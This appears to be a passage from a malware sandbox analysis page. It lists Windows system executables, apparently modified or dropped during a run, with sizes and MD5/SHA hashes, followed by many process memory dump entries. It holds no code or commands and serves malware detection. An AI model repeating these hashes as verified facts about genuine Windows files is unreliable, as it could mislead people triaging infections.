f38cb251a3a15ad9df0f76d579409412d9d1d198a5771b9e219feeb2db7febc64a66258d22528e5ea85aba11218f61de929ce7758853233333257c38dcf01ebe

Download Submit
C:\Windows\System32\Spectrum.exe

Filesize
1.4MB

MD5
216c629ab87231f6e9f28d3b5aae1a03

SHA1
3ac2e6b6a4a25ba6063ede471d3cc4d9ac2f5121

SHA256
aefbe417162a622d996295db54256c9c2dfde28b19cf74bb6492841f72bd1ce8

SHA512
657a450e4c18cd05a5519dba2f064ce27d0aad0d3b29cbf80a1fd1249a22eb5d389c19505dc1a0642b4039bc768c4485125485a08d0d7d3982613eb4e81c9c5a

Download Submit
C:\Windows\System32\TieringEngineService.exe

Filesize
1.4MB

MD5
1ef0f4ede8e031caf81e002c11648aa6

SHA1
8a76daf1533a4035f542066c152751176a7fb5bf

SHA256
457785a77fd8d3cb084f78bd99791870f015034718d231b64f8316ca0c6e0cab

SHA512
f3e6ad25c88906a103a723bf6cdfd546edfecb19c4e37bc8ebfb46a1419d414fb6a4988b9a8c16c427ce9cf5d842e3ac40265d2dd45eb69b66392ca2f86768ee

Download Submit
C:\Windows\System32\VSSVC.exe

Filesize
2.0MB

MD5
1a988c56802d49f21e8fce4f83035b7c

SHA1
f073c3b83cfb7f8b267f0da3d38752c2a8ee2c43

SHA256
0b3a026f1fb49efa13cfc3834ba4fa4887a9f8784e30fb029d647e154ac42361

SHA512
258e35333575a263b282ddbc2f21bd8a076bf0dfce60b1e56057044702ef96c1127fa48f57dabaff471fdcfe6f3a953cd8c302eb7cc6212337c2619af3a9e94f

Download Submit
C:\Windows\System32\alg.exe

Filesize
1.2MB

MD5
f3f95929b8bb87e99c03f1622757063d

SHA1
a5a37558a9501b9f913ffee5913edf95b50a7cb3

SHA256
7f8b3786f256940e24fac968c4435a64067bdd3d756bee412fa8b1d23692d5e6

SHA512
6f648f8a7888cd1d4565d843120327713b48ba2e96d8b9ee05fc285ac45a8dba9e0d2a403e1228ddad91014f6e4644783d3c3f40926d00f1a1dd9d8ee0a52160

Download Submit
C:\Windows\System32\msdtc.exe

Filesize
1.2MB

MD5
cff879e19b4f17c4c2c807b24fc449be

SHA1
c09aecde647365d6bdce1e4ea1320484b98d1968

SHA256
0c2b7a9997e78031e1f51d8173d948ed2ebff1f17dfd8823e87d3db9f73664e3

SHA512
e81ddb8967a4a46b6babb28c73bf355cbc7eee509d080f70927110492b5d6241ccd6c6a0fd80303106c02694e6866f304c1f6ba6779036097ab92489b586c3d5

Download Submit
C:\Windows\System32\snmptrap.exe

Filesize
1.1MB

MD5
1d1a6349db557332def915b8b82e2f86

SHA1
e41464c49aafd348dcc3b17f7cdc51698ce6cd6b

SHA256
4bf02d572149f42a4c743054563ea17d9f7915bb81be8583bff28c0f1c91bd56

SHA512
10c372e6f72ad30a4ed0f8a46215b4966829e3ba1c76e419acb6378c8f3cf6f7658c7b308c39cb03459531acc2ae9ad7d42e46ff5afdfe80ee1029adf80b4bd3

Download Submit
C:\Windows\System32\vds.exe

Filesize
1.3MB

MD5
9158e347eb68350e2b1a0f9830db9c60

SHA1
3494068d8cc7684721b15edb11fef2b67d11639d

SHA256
ce74542cbef7cdb8f038e62910bb6aeb3898a8f5ce29bc5b1ae5d611b74c9f7c

SHA512
efbac1ee6f5f39a9cd0129d4815b1e17bd7e5dd4a51dea88c13004c8b314d7b58e8ab3d66248cad10a60be0cfc1695d37a15e84f8762dc34123f1274b44ef329

Download Submit
C:\Windows\System32\wbem\WmiApSrv.exe

Filesize
1.3MB

MD5
9f40262dd94c4258bf808c00b726379c

SHA1
581bc48494072194875697e21134b076a1faea18

SHA256
e1c22e787b8ffec94c545eee3afa0cc65949b70869b98348afa7a8037421ec88

SHA512
c8b416f1aa3dc2ab337601d685aeadcfa95dfe249d4052b3ca0535a70ebd1b01c7b4937a224754db299dafccde1afffc09d31fc2d0193117d456f56f54221adb

Download Submit
C:\Windows\System32\wbengine.exe

Filesize
2.1MB

MD5
74ba5a02edd091708b6e558598ef4f8f

SHA1
c8d5c139309ab866087e3f4274d5409e6ea010fd

SHA256
a9dc22a9da3281020729ea9328b8f7e11746400ba3f06b97c479774db2d07455

SHA512
1925f07aff681a347adda1b9b03ee31d1ed53c870d82ff42d872bec48ce6c4898caeb358254e194b0bb3ed895856ae79630ecfb59f4388a64be66e14c068fc13

Download Submit
C:\Windows\system32\AppVClient.exe

Filesize
1.3MB

MD5
db070e4c5ac4d3a517926301910a7b87

SHA1
4e797a15b483176b9decc35cd5adf3abceff3a6e

SHA256
e7c99ab84da5fdd561b9428060914ca3b8168976013fd7dc0506ef806b479bf0

SHA512
1aee9049abc50bf9a898014ee4abe193218de23747b2b7719c9deaddc3da3c086d3f197dc0954246564eba0d5a4f75a66630fed7e7f9858b5e6c1b1ae4d1d894

Download Submit
C:\Windows\system32\SgrmBroker.exe

Filesize
1.4MB

MD5
83cbff11b0514bb5354fc4ebb4a774fa

SHA1
5e680eeb2566f81459f5717f09d73bbebf9cc203

SHA256
4cf39a3f9ba3cf8474a93362d8f34c1dab22edb2a939685c397861a6c007f72d

SHA512
2cbf4353e625804324689839a4a253e6dec044dfb58d9053093a93b634fb126e81574650fbdd49e9f794f0e8aab0539d6f396ae35d975989ecc76879b49b78d3

Download Submit
C:\Windows\system32\msiexec.exe

Filesize
1.1MB

MD5
51111be5106e097a0efa4b22820265e9

SHA1
26412bf5a73df530d8f2328d5502fa555b7c2dd0

SHA256
bbaa1a0bc189ee735d05ef710565d6c080711de142b5ccdb563c815f2509ee72

SHA512
7d62420d0bd0c08d6a614d1306c9fde43a6556256ecee0962e1cb41a34cad1907b3d4bd4c2a14cb6ec25a221f55eb91eecbb0a367edc5cf18b42cf98279887eb

Download Submit
memory/112-12-0x000001D1FC430000-0x000001D1FC452000-memory.dmp

Filesize
136KB

Download
memory/1056-1147-0x0000000140000000-0x000000014012F000-memory.dmp

Filesize
1.2MB

Download
memory/1056-554-0x0000000140000000-0x000000014012F000-memory.dmp

Filesize
1.2MB

Download
memory/2168-1378-0x0000000140000000-0x0000000140169000-memory.dmp

Filesize
1.4MB

Download
memory/2168-1172-0x0000000140000000-0x0000000140169000-memory.dmp

Filesize
1.4MB

Download
memory/2248-1519-0x0000000140000000-0x0000000140147000-memory.dmp

Filesize
1.3MB

Download
memory/2248-1216-0x0000000140000000-0x0000000140147000-memory.dmp

Filesize
1.3MB

Download
memory/2344-100-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-87-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-68-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-93-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-67-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-59-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-63-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-62-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-61-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-58-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-57-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-55-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-54-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-77-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-94-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-96-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-78-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-97-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-79-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-80-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-101-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-82-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-50-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-49-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-81-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-102-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-70-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-52-0x0000000000400000-0x0000000000500000-memory.dmp

Filesize
1024KB

Download
memory/2344-69-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-56-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-60-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-84-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-66-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-109-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-92-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-75-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-90-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-65-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-111-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-76-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-95-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-114-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-113-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-71-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-86-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-89-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-108-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-98-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-91-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-74-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-104-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-64-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-103-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-112-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-88-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-105-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-107-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-83-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-85-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-73-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-110-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-72-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2344-106-0x0000000002A20000-0x0000000003A20000-memory.dmp

Filesize
16.0MB

Download
memory/2416-1148-0x0000000140000000-0x00000001401D7000-memory.dmp

Filesize
1.8MB

Download
memory/2416-1264-0x0000000140000000-0x00000001401D7000-memory.dmp

Filesize
1.8MB

Download
memory/2416-1526-0x0000000140000000-0x00000001401D7000-memory.dmp

Filesize
1.8MB

Download
memory/2432-1215-0x0000000140000000-0x0000000140155000-memory.dmp

Filesize
1.3MB

Download
memory/2432-1101-0x0000000140000000-0x0000000140155000-memory.dmp

Filesize
1.3MB

Download
memory/2548-564-0x00000000293C0000-0x0000000029964000-memory.dmp

Filesize
5.6MB

Download
memory/2548-1056-0x000000002A710000-0x000000002A7A2000-memory.dmp

Filesize
584KB

Download
memory/2548-511-0x0000000000400000-0x0000000000552000-memory.dmp

Filesize
1.3MB

Download
memory/2548-1325-0x000000002AB70000-0x000000002AB7A000-memory.dmp

Filesize
40KB

Download
memory/2548-563-0x0000000026C70000-0x0000000026CA6000-memory.dmp

Filesize
216KB

Download
memory/2548-1322-0x000000002A980000-0x000000002AB42000-memory.dmp

Filesize
1.8MB

Download
memory/2548-565-0x00000000270A0000-0x00000000270D4000-memory.dmp

Filesize
208KB

Download
memory/2548-1086-0x0000000000400000-0x0000000000552000-memory.dmp

Filesize
1.3MB

Download
memory/2548-1057-0x000000002A820000-0x000000002A870000-memory.dmp

Filesize
320KB

Download
memory/2548-1031-0x00000000291E0000-0x000000002927C000-memory.dmp

Filesize
624KB

Download
memory/2596-1200-0x0000000140000000-0x000000014013F000-memory.dmp

Filesize
1.2MB

Download
memory/2596-1087-0x0000000140000000-0x000000014013F000-memory.dmp

Filesize
1.2MB

Download
memory/2688-1185-0x0000000140000000-0x0000000140188000-memory.dmp

Filesize
1.5MB

Download
memory/2688-1417-0x0000000140000000-0x0000000140188000-memory.dmp

Filesize
1.5MB

Download
memory/3576-1158-0x0000000140000000-0x000000014011C000-memory.dmp

Filesize
1.1MB

Download
memory/3576-1337-0x0000000140000000-0x000000014011C000-memory.dmp

Filesize
1.1MB

Download
memory/3716-1227-0x0000000140000000-0x0000000140131000-memory.dmp

Filesize
1.2MB

Download
memory/3716-1113-0x0000000140000000-0x0000000140131000-memory.dmp

Filesize
1.2MB

Download
memory/4372-1523-0x0000000140000000-0x00000001401FC000-memory.dmp

Filesize
2.0MB

Download
memory/4372-1228-0x0000000140000000-0x00000001401FC000-memory.dmp

Filesize
2.0MB

Download
memory/4512-1127-0x0000000140000000-0x0000000140130000-memory.dmp

Filesize
1.2MB

Download
memory/4512-547-0x0000000140000000-0x0000000140130000-memory.dmp

Filesize
1.2MB

Download
memory/4740-1239-0x0000000000400000-0x000000000051D000-memory.dmp

Filesize
1.1MB

Download
memory/4740-1124-0x0000000000400000-0x000000000051D000-memory.dmp

Filesize
1.1MB

Download
memory/4796-1213-0x0000000140000000-0x00000001401C0000-memory.dmp

Filesize
1.8MB

Download
memory/4796-1201-0x0000000140000000-0x00000001401C0000-memory.dmp

Filesize
1.8MB

Download
memory/5048-1251-0x0000000140000000-0x000000014011B000-memory.dmp

Filesize
1.1MB

Download
memory/5048-1128-0x0000000140000000-0x000000014011B000-memory.dmp

Filesize
1.1MB

Download
memory/5144-1577-0x0000000140000000-0x0000000140216000-memory.dmp

Filesize
2.1MB

Download
memory/5144-1248-0x0000000140000000-0x0000000140216000-memory.dmp

Filesize
2.1MB

Download
memory/5220-1597-0x0000000140000000-0x000000014014C000-memory.dmp

Filesize
1.3MB

Download
memory/5220-1252-0x0000000140000000-0x000000014014C000-memory.dmp

Filesize
1.3MB

Download
memory/5388-1271-0x0000000140000000-0x0000000140179000-memory.dmp

Filesize
1.5MB

Download
memory/5388-1598-0x0000000140000000-0x0000000140179000-memory.dmp

Filesize
1.5MB

Download
memory/5500-1197-0x0000000140000000-0x0000000140168000-memory.dmp

Filesize
1.4MB

Download
memory/5500-1442-0x0000000140000000-0x0000000140168000-memory.dmp

Filesize
1.4MB

Download
memory/5704-1033-0x0000000140000000-0x0000000140135000-memory.dmp

Filesize
1.2MB

Download
memory/5704-1049-0x0000000140000000-0x0000000140135000-memory.dmp

Filesize
1.2MB

Download
memory/5844-1044-0x0000000140000000-0x0000000140234000-memory.dmp

Filesize
2.2MB

Download
memory/5844-1171-0x0000000140000000-0x0000000140234000-memory.dmp

Filesize
2.2MB

Download
memory/6016-1068-0x0000000140000000-0x000000014022B000-memory.dmp

Filesize
2.2MB

Download
memory/6016-1176-0x0000000140000000-0x000000014022B000-memory.dmp

Filesize
2.2MB

Download
memory/6100-1079-0x0000000140000000-0x0000000140155000-memory.dmp

Filesize
1.3MB

Download
memory/6100-1083-0x0000000140000000-0x0000000140155000-memory.dmp

Filesize
1.3MB

Download